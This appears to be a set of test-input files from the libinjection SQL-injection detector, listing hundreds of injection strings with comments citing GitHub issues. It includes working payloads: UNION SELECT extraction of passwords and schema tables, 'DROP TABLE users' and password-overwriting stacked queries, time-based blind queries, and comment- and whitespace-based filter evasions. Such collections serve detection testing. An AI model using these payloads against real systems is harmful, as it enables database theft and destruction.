( (SELECT @a OR ( 1)) ) --
( (SELECT @a OR ( COS ( 'b'))) ) --
( (SELECT @a OR ( @a)) ) --
( (SELECT @a OR 1 * 'b') ) --
( (SELECT @a OR 'a' * 'b') ) --
( (SELECT @a OR @a * 'b') ) --
( (SELECT @a ) OR ( 'b') ) --
( (SELECT @a ) OR COS ( 'b') ) --
( ( SELECT @a ) OR 'b' ) --
( (SELECT @a UNION ( SELECT 'b')) ) --
( (SELECT @a in ( BINARY ( 'b'))) ) --
( COS ( ( SELECT ( SELECT 'b'))) ) --
( COS ( ( SELECT 1 OR 'b')) ) --
( COS ( ( SELECT 'a' OR 'b')) ) --
( COS ( ( SELECT BINARY ( 'b'))) ) --
( COS ( ( SELECT BINARY COS ( 'b'))) ) --
( COS ( ( SELECT @a OR 'b')) ) --
( COS ( BINARY ( BINARY ( 'b'))) ) --
( COS ( BINARY BINARY BINARY ( 'b')) ) --
( 'a' OR ( BINARY ( 'b')) ) --
( 'a' OR ( BINARY COS ( 'b')) ) --
( 'a' OR COS ( BINARY ( 'b')) ) --
( 'a' ) in ( BINARY ( 'b') ) --
( 'a' * COS ( BINARY ( 'b')) ) --
( BINARY ( 1 OR ( 'b')) ) --
( BINARY ( 1 OR 1) ) --
( BINARY ( 1 OR COS ( 'b')) ) --
( BINARY ( 1 OR @a) ) --
( BINARY ( 1 ) OR 'b' ) --
( BINARY ( SELECT ( 1)) ) --
( BINARY ( SELECT ( SELECT 'b')) ) --
( BINARY ( SELECT ( COS ( 'b'))) ) --
( BINARY ( SELECT ( @a)) ) --
( BINARY ( SELECT 1 OR 'b') ) --
( BINARY ( SELECT 1 * 'b') ) --
( BINARY ( SELECT 'a' OR 'b') ) --
( BINARY ( SELECT 'a' * 'b') ) --
( BINARY ( SELECT BINARY ( 'b')) ) --
( BINARY ( SELECT BINARY COS ( 'b')) ) --
( BINARY ( SELECT @a OR 'b') ) --
( BINARY ( SELECT @a * 'b') ) --
( BINARY ( COS ( ( SELECT 'b'))) ) --
( BINARY ( COS ( BINARY ( 'b'))) ) --
( BINARY ( 'a' OR ( 'b')) ) --
( BINARY ( 'a' OR 1) ) --
( BINARY ( 'a' OR COS ( 'b')) ) --
( BINARY ( 'a' OR @a) ) --
( BINARY ( 'a' ) OR 'b' ) --
( BINARY ( BINARY ( SELECT 'b')) ) --
( BINARY ( BINARY BINARY ( 'b')) ) --
( BINARY ( BINARY BINARY COS ( 'b')) ) --
( BINARY ( @a OR ( 'b')) ) --
( BINARY ( @a OR 1) ) --
( BINARY ( @a OR COS ( 'b')) ) --
( BINARY ( @a OR @a) ) --
( BINARY ( @a ) OR 'b' ) --
( BINARY COS ( ( SELECT ( 'b'))) ) --
( BINARY COS ( ( SELECT 1)) ) --
( BINARY COS ( ( SELECT COS ( 'b'))) ) --
( BINARY COS ( ( SELECT @a)) ) --
( BINARY COS ( BINARY BINARY ( 'b')) ) --
( BINARY BINARY ( 1 OR 'b') ) --
( BINARY BINARY ( 1 * 'b') ) --
( BINARY BINARY ( SELECT ( 'b')) ) --
( BINARY BINARY ( SELECT 1) ) --
( BINARY BINARY ( SELECT COS ( 'b')) ) --
( BINARY BINARY ( SELECT @a) ) --
( BINARY BINARY ( 'a' OR 'b') ) --
( BINARY BINARY ( 'a' * 'b') ) --
( BINARY BINARY ( BINARY ( 'b')) ) --
( BINARY BINARY ( BINARY COS ( 'b')) ) --
( BINARY BINARY ( @a OR 'b') ) --
( BINARY BINARY ( @a * 'b') ) --
( BINARY BINARY COS ( ( SELECT 'b')) ) --
( BINARY BINARY COS ( BINARY ( 'b')) ) --
( BINARY BINARY BINARY ( 1) ) --
( BINARY BINARY BINARY ( SELECT 'b') ) --
( BINARY BINARY BINARY ( COS ( 'b')) ) --
( BINARY BINARY BINARY ( @a) ) --
( BINARY BINARY BINARY BINARY ( 'b') ) --
( BINARY BINARY BINARY BINARY COS ( 'b') ) --
( @a OR ( BINARY ( 'b')) ) --
( @a OR ( BINARY COS ( 'b')) ) --
( @a OR COS ( BINARY ( 'b')) ) --
( @a ) in ( BINARY ( 'b') ) --
( @a in ( BINARY BINARY ( 'b')) ) --
( @a * COS ( BINARY ( 'b')) ) --
( 1 - (SELECT BINARY ( 1)) ) --
( 1 - BINARY ( SELECT 1) ) --
( 1 - BINARY COS ( ( 1)) ) --
( 1 - BINARY BINARY ( 1) ) --
( 1 - BINARY BINARY COS ( 1) ) --
( 1 - BINARY BINARY BINARY ( 'b') ) --
( 'a' or (SELECT BINARY ( 'b')) ) --
( 'a' or BINARY ( SELECT 'b') ) --
( 'a' or BINARY COS ( 1) ) --
( 'a' or BINARY BINARY ( 'b') ) --
( 'a' or BINARY BINARY COS ( 'b') ) --
( 1 IN (1) or (SELECT BINARY ( 'b')) ) --
( 1 IN (1) or BINARY ( SELECT 'b') ) --
( 1 IN (1) or BINARY COS ( 1) ) --
( 1 IN (1) or BINARY BINARY ( 'b') ) --
( 1 IN (1) or BINARY BINARY COS ( 'b') ) --
(select 1 from dual union select 1 limit 1) --
(select 1); (select 1); update users set password = 99
(select 1); select 1; update users set password = 99
select 1; (select 1); update users set password = 99
1; update users set password=1
( (SELECT 'b') ) ; UPDATE user set password = 99;
( (SELECT @a) ) ; UPDATE user set password = 99;

View file

@ -0,0 +1,6 @@
# https://github.com/client9/libinjection/issues/110
# lots of great details in this ticket HT: @lifeforms
id having (1 or 1)
id having (1 or true)
id having (true or 1)

View file

@ -0,0 +1,4 @@
# https://github.com/client9/libinjection/issues/114
# ht @sshayb
; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2

View file

@ -0,0 +1 @@
name=David' AND 2259=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(113)||CHR(122)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2259=2259) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))) AND 'XrMo' LIKE 'XrMo

View file

@ -0,0 +1,11 @@
# https://github.com/client9/libinjection/issues/125 HT @d0znpp
"-sqlite_version() UNION SELECT password FROM users- --
1337) INTO OUTFILE xxx--
123);DROP TABLE users--
) OR (SELECT password FROM users ...
# the following don't fit into the libinjection model and are
# best handled in another layer, at least for now.
#)-sleep(9999
#*/UNION SELECT password FROM users--

View file

@ -0,0 +1,3 @@
# https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/782
.1or-UTC_DATE--

View file

@ -0,0 +1,265 @@
1%20AND%20%28select%20DCount%28last%28username%29
1%29%20from%20users%20where%20username%3D%27ad1min%27%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20substr%28id%2C%40a%2C%40v%29%20from%20users%20limit%201%2C1%29
%28select%20substr%20%28id%2C%40a%2C%40v%29%20from%20users%20limit%201%2C1%29
%28select%20login/2%20from%20users%20limit%201%2C1%29
%28select%20login/2%20%0D%0A%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
union%20%28select%20id%20from%20users%20limit%201%2C1%29
0x00%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
0x30%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
0x3%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-0union%20%28select%20id%20from%20users%20limit%201%2C1%29
-union%20%28select%20id%20from%20users%20limit%201%2C1%29
-.1union%20%28select%20id%20from%20users%20limit%201%2C1%29
-.1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-.1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20table_name%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%2C1%0D%0A%2C%0D%0A2%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%2C1%0D%0A%2C%0D%0A2%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%2C%0D%0A%0D%0A1%0D%0A%0D%0A%2C%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A1%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%2C
%28select%20substr%28login%0D%0A%29
%28select%20substr%28login%29
%28select%20substr%28login%29%0D%0Afrom%20users%20limit%201%2C1%29
##%28select%20asd%28login%29%0D%0Afrom%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
/%2A%20BAR%20%2A/%20UNION%20ALL%20SELECT%20%282%2C3%2C4%29
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
%27%20or%201%3D1%20or%20%27
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
0x1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27foo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
oo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
a%0D%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
id%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%201%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%20xxx%20from%20users%20limit%201%2C1%29
oo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%27%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23aaaaa%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%231aaaaa%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%231a%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%231a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23--1a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23--%20-1a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
-1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%20union%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20union
-1%20union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%0Aunion%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20%23union%0A%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20%23feafafeas%0A%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20%23feafafeas%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20--eafafeas%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20--eafafeas%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20--%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20--%0A%20union%28%20select%20id%20from%20users%20limit%201%2C1%29
-1%20--%0A%20%28union%28%20select%20id%20from%20users%20limit%201%2C1%29%29
-1--%0A%20%28union%28%20select%20id%20from%20users%20limit%201%2C1%29%29
-1--%0A%20%28union%28%20select%20table_name%20from%20users%20limit%201%2C1%29%29
-1--%0A%20%28union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20all%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20%23%28%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20%23%28%23%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20select%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%0Cselect%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%0C%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%0C-%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20%23%28%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0D%0A%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1--%0D%0A%20union%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
%27-%40%D1%84%D1%84%D1%841-%40a%20union%20select%20us3rs%20from%20table1
%27union%20select%20us3rs%20from%20table1
%27-%40aa1-%40a%20union%20select%20us3rs%20from%20table1
%27-%40%D1%84%D1%84%D1%841-%40a%20union%20select%20us3rs%20from%20table1
%27-%40UNION1-%40a%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841-%40%D0%B0%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
%27-%40a1%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841-%40a%20union%20select%20us3rs%20from%20table1
%27-%40a2-%40a3%5E%40a3%20union%20select%20us3rs%20from%20table1
%27-%40a2-%40a3%5E%40a3-%40a5%20union%20select%20us3rs%20from%20table1
%27-%40a2%5E%40a3%5E%40a3-%40a5%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
%27-%401%20union%20select%20us3rs%20from%20table1
%27-%401%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select-table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
-1%20union%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29
-1%20union%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
%27-%40a1%20union%20select%20us3rs%20from%20table1
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23%0D%0A%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
#-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
